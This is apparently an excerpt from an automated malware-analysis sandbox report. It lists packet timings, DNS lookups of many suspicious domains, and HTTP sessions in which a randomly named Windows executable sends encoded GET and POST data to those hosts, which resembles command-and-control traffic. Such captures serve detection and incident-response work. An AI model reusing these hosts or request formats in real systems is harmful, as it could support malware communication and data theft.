                                                                            Dec 10, 2024 16:25:03.720109940 CET80499553.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:04.696904898 CET80499553.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:04.697022915 CET80499553.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:04.697169065 CET4995580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:05.113751888 CET4995580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:06.132576942 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:06.252741098 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:06.253398895 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:06.272141933 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:06.392450094 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:06.392465115 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:07.347980976 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:07.348056078 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:07.348123074 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:07.634676933 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:07.634731054 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:07.785746098 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:08.804914951 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:09.057667017 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:09.057743073 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:09.065984964 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:09.186410904 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:19.188924074 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:19.188941002 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:19.189090014 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:19.192341089 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:19.352365017 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:22.824421883 CET80499453.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:22.826234102 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:24.660504103 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:24.781789064 CET804999546.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:24.781955004 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:24.796169043 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:24.915539980 CET804999546.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:26.302170992 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:26.444973946 CET804999546.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:26.445143938 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:27.321480989 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:27.441878080 CET804999646.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:27.441948891 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:27.455949068 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:27.583658934 CET804999646.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:28.958389997 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:29.078142881 CET804999646.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:29.078255892 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:29.976552010 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:30.095957994 CET804999746.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:30.096096992 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:30.110182047 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:30.229554892 CET804999746.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:30.229624033 CET804999746.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:31.613836050 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:31.733447075 CET804999746.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:31.733537912 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:32.634183884 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:32.753469944 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:32.754312992 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:32.770186901 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:32.889481068 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:40.784006119 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:40.784101009 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:40.784275055 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:40.787024021 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:40.906336069 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:46.920365095 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:47.042906046 CET804999974.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:47.042983055 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:47.059088945 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:47.180469990 CET804999974.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:48.568365097 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:48.688707113 CET804999974.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:48.689929962 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:49.587327957 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:49.706986904 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:49.707067013 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:49.721002102 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:49.840517044 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:51.223206997 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:51.230290890 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:51.230348110 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:51.230396032 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:51.230451107 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:51.343481064 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:51.343537092 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:52.242110968 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:52.361376047 CET805000174.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:52.361660004 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:52.373214006 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:52.492641926 CET805000174.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:52.493120909 CET805000174.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:53.879832029 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:54.001362085 CET805000174.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:54.001631021 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:54.898746967 CET5000280192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:55.018651962 CET805000274.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:55.018965960 CET5000280192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:55.028652906 CET5000280192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:55.149743080 CET805000274.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:56.549738884 CET805000274.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:56.550185919 CET805000274.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:27:07.758972883 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.758989096 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.767689943 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.767759085 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.767864943 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.775847912 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.775908947 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.776000977 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.784358025 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.784425974 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.784440041 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.792778015 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.792856932 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.792911053 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.801296949 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.801373959 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.801413059 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.809751987 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.809797049 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.809823990 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.818186045 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.818326950 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.818418026 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.826189995 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.826255083 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.826302052 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.858206034 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.858278990 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.981132984 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.981286049 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.981359959 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.983218908 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.983392000 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.983591080 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.986685991 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.986859083 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.987003088 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.991355896 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.991489887 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.991556883 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.995829105 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.995915890 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.995981932 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.000296116 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.000488043 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.001897097 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.004945993 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.005100965 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.005153894 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.009460926 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.009589911 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.009717941 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.014067888 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.014381886 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.014431953 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.018527031 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.018660069 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.018707037 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.023117065 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.023977995 CET5001680192.168.2.531.31.198.145
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 10, 2024 16:23:42.577820063 CET6220853192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:23:43.233179092 CET53622081.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:23:59.553280115 CET5450653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:23:59.872495890 CET53545061.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:24:14.636581898 CET5972753192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:24:15.087203026 CET53597271.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:24:29.445977926 CET6434053192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:24:30.442056894 CET6434053192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:24:30.498300076 CET53643401.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:24:30.580530882 CET53643401.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:24:44.962354898 CET5857653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:24:45.915019989 CET53585761.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:25:00.179809093 CET5038653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:25:00.687053919 CET53503861.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:25:24.214154005 CET6528153192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:25:24.654818058 CET53652811.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:25:45.806879044 CET6440853192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:25:46.820292950 CET6440853192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:25:46.917283058 CET53644081.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:25:46.958142996 CET53644081.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:01.571108103 CET6432153192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:02.582622051 CET6432153192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:03.294172049 CET53643211.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:03.294214964 CET53643211.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:17.524209976 CET6203253192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:18.279344082 CET53620321.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:37.900413990 CET6250653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:38.895178080 CET6250653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:39.021040916 CET53625061.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:39.032732010 CET53625061.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:53.352015972 CET5098753192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:53.759470940 CET53509871.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:27:01.856993914 CET6353053192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:27:02.340205908 CET53635301.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 16:23:42.577820063 CET | 192.168.2.5 | 1.1.1.1 | 0xb5e6 | Standard query (0) | www.regents.health | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:23:59.553280115 CET | 192.168.2.5 | 1.1.1.1 | 0x655c | Standard query (0) | www.73613.shop | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:14.636581898 CET | 192.168.2.5 | 1.1.1.1 | 0x5786 | Standard query (0) | www.eco-tops.website | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:29.445977926 CET | 192.168.2.5 | 1.1.1.1 | 0x3ab2 | Standard query (0) | www.astrext.info | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:30.442056894 CET | 192.168.2.5 | 1.1.1.1 | 0x3ab2 | Standard query (0) | www.astrext.info | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:44.962354898 CET | 192.168.2.5 | 1.1.1.1 | 0x7c74 | Standard query (0) | www.newhopetoday.app | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:00.179809093 CET | 192.168.2.5 | 1.1.1.1 | 0xc531 | Standard query (0) | www.binacamasala.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:24.214154005 CET | 192.168.2.5 | 1.1.1.1 | 0x85d5 | Standard query (0) | www.dlion.net | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:45.806879044 CET | 192.168.2.5 | 1.1.1.1 | 0xb58a | Standard query (0) | www.bioart.buzz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:46.820292950 CET | 192.168.2.5 | 1.1.1.1 | 0xb58a | Standard query (0) | www.bioart.buzz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:01.571108103 CET | 192.168.2.5 | 1.1.1.1 | 0xbd32 | Standard query (0) | www.06753.photo | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:02.582622051 CET | 192.168.2.5 | 1.1.1.1 | 0xbd32 | Standard query (0) | www.06753.photo | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:17.524209976 CET | 192.168.2.5 | 1.1.1.1 | 0xba33 | Standard query (0) | www.gucciqueen.shop | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:37.900413990 CET | 192.168.2.5 | 1.1.1.1 | 0xfd12 | Standard query (0) | www.premium303max.rest | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:38.895178080 CET | 192.168.2.5 | 1.1.1.1 | 0xfd12 | Standard query (0) | www.premium303max.rest | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:53.352015972 CET | 192.168.2.5 | 1.1.1.1 | 0xed9a | Standard query (0) | www.mnpl.online | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:27:01.856993914 CET | 192.168.2.5 | 1.1.1.1 | 0xc51e | Standard query (0) | www.locuramagica.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 16:23:43.233179092 CET | 1.1.1.1 | 192.168.2.5 | 0xb5e6 | No error (0) | www.regents.health | regents.health | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:23:43.233179092 CET | 1.1.1.1 | 192.168.2.5 | 0xb5e6 | No error (0) | regents.health | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:23:43.233179092 CET | 1.1.1.1 | 192.168.2.5 | 0xb5e6 | No error (0) | regents.health | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:23:59.872495890 CET | 1.1.1.1 | 192.168.2.5 | 0x655c | No error (0) | www.73613.shop | | 180.178.39.236 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:23:59.872495890 CET | 1.1.1.1 | 192.168.2.5 | 0x655c | No error (0) | www.73613.shop | | 180.178.39.235 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:23:59.872495890 CET | 1.1.1.1 | 192.168.2.5 | 0x655c | No error (0) | www.73613.shop | | 180.178.39.237 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:23:59.872495890 CET | 1.1.1.1 | 192.168.2.5 | 0x655c | No error (0) | www.73613.shop | | 180.178.39.238 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:15.087203026 CET | 1.1.1.1 | 192.168.2.5 | 0x5786 | No error (0) | www.eco-tops.website | | 203.161.49.193 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:30.498300076 CET | 1.1.1.1 | 192.168.2.5 | 0x3ab2 | No error (0) | www.astrext.info | | 217.160.0.132 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:30.580530882 CET | 1.1.1.1 | 192.168.2.5 | 0x3ab2 | No error (0) | www.astrext.info | | 217.160.0.132 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:45.915019989 CET | 1.1.1.1 | 192.168.2.5 | 0x7c74 | No error (0) | www.newhopetoday.app | | 216.40.34.41 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:00.687053919 CET | 1.1.1.1 | 192.168.2.5 | 0xc531 | No error (0) | www.binacamasala.com | binacamasala.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:25:00.687053919 CET | 1.1.1.1 | 192.168.2.5 | 0xc531 | No error (0) | binacamasala.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:00.687053919 CET | 1.1.1.1 | 192.168.2.5 | 0xc531 | No error (0) | binacamasala.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:24.654818058 CET | 1.1.1.1 | 192.168.2.5 | 0x85d5 | No error (0) | www.dlion.net | dlion.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:25:24.654818058 CET | 1.1.1.1 | 192.168.2.5 | 0x85d5 | No error (0) | dlion.net | | 46.38.243.234 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:46.917283058 CET | 1.1.1.1 | 192.168.2.5 | 0xb58a | No error (0) | www.bioart.buzz | cn-hk2.rvh2.raincs.cn | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:25:46.917283058 CET | 1.1.1.1 | 192.168.2.5 | 0xb58a | No error (0) | cn-hk2.rvh2.raincs.cn | | 74.48.34.43 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:46.958142996 CET | 1.1.1.1 | 192.168.2.5 | 0xb58a | No error (0) | www.bioart.buzz | cn-hk2.rvh2.raincs.cn | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:25:46.958142996 CET | 1.1.1.1 | 192.168.2.5 | 0xb58a | No error (0) | cn-hk2.rvh2.raincs.cn | | 74.48.34.43 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:03.294172049 CET | 1.1.1.1 | 192.168.2.5 | 0xbd32 | No error (0) | www.06753.photo | uaslkd.skasdhu.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:26:03.294172049 CET | 1.1.1.1 | 192.168.2.5 | 0xbd32 | No error (0) | uaslkd.skasdhu.huhusddfnsuegcdn.com | gtml.huksa.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:26:03.294172049 CET | 1.1.1.1 | 192.168.2.5 | 0xbd32 | No error (0) | gtml.huksa.huhusddfnsuegcdn.com | | 23.167.152.41 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:03.294214964 CET | 1.1.1.1 | 192.168.2.5 | 0xbd32 | No error (0) | www.06753.photo | uaslkd.skasdhu.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:26:03.294214964 CET | 1.1.1.1 | 192.168.2.5 | 0xbd32 | No error (0) | uaslkd.skasdhu.huhusddfnsuegcdn.com | gtml.huksa.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:26:03.294214964 CET | 1.1.1.1 | 192.168.2.5 | 0xbd32 | No error (0) | gtml.huksa.huhusddfnsuegcdn.com | | 23.167.152.41 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:18.279344082 CET | 1.1.1.1 | 192.168.2.5 | 0xba33 | No error (0) | www.gucciqueen.shop | gucciqueen.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:26:18.279344082 CET | 1.1.1.1 | 192.168.2.5 | 0xba33 | No error (0) | gucciqueen.shop | | 178.79.184.196 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:39.021040916 CET | 1.1.1.1 | 192.168.2.5 | 0xfd12 | No error (0) | www.premium303max.rest | | 45.79.252.94 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:39.032732010 CET | 1.1.1.1 | 192.168.2.5 | 0xfd12 | No error (0) | www.premium303max.rest | | 45.79.252.94 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:53.759470940 CET | 1.1.1.1 | 192.168.2.5 | 0xed9a | Name error (3) | www.mnpl.online | none | none | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:27:02.340205908 CET | 1.1.1.1 | 192.168.2.5 | 0xc51e | No error (0) | www.locuramagica.online | | 31.31.198.145 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49757 | 3.33.130.190 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:23:43.367466927 CET | 534 | OUT | GET /q97g/?UTJ0bhC=KK21uW0xHvorSk2vqcKD6wcSSPO+hyXQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B9BwzLeItohU7wCU4mTfCSECcS++9DVG9zxqTCFVXtteVmg==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.regents.health
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:23:49.466730118 CET | 392 | IN | HTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Tue, 10 Dec 2024 15:23:49 GMT
                                                                            content-length: 271
                                                                            connection: close
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UTJ0bhC=KK21uW0xHvorSk2vqcKD6wcSSPO+hyXQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B9BwzLeItohU7wCU4mTfCSECcS++9DVG9zxqTCFVXtteVmg==&Pt=fDlHoNWP0RBd"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49796 | 180.178.39.236 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:00.074867010 CET | 779 | OUT | POST /tizt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.73613.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.73613.shop
                                                                            Referer: http://www.73613.shop/tizt/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=nkKelaCdXUds+qM8sQz0g7hvQy1uEeyEI9utn/gYfYAt5PVwBziSb0voKn61Zu3s6uYSkj/z4W0hobNb1TXaofFt17/4wckeghkJ6Q+Qe/nqVS3UH7SqMzOYAqr8tBqvFkMqNKuZo8td/PlioEcupffG3l2cRjbFKstmdJa9rfNvVfz0Zd4Fp/rHZLci4EsRRakEsqs=
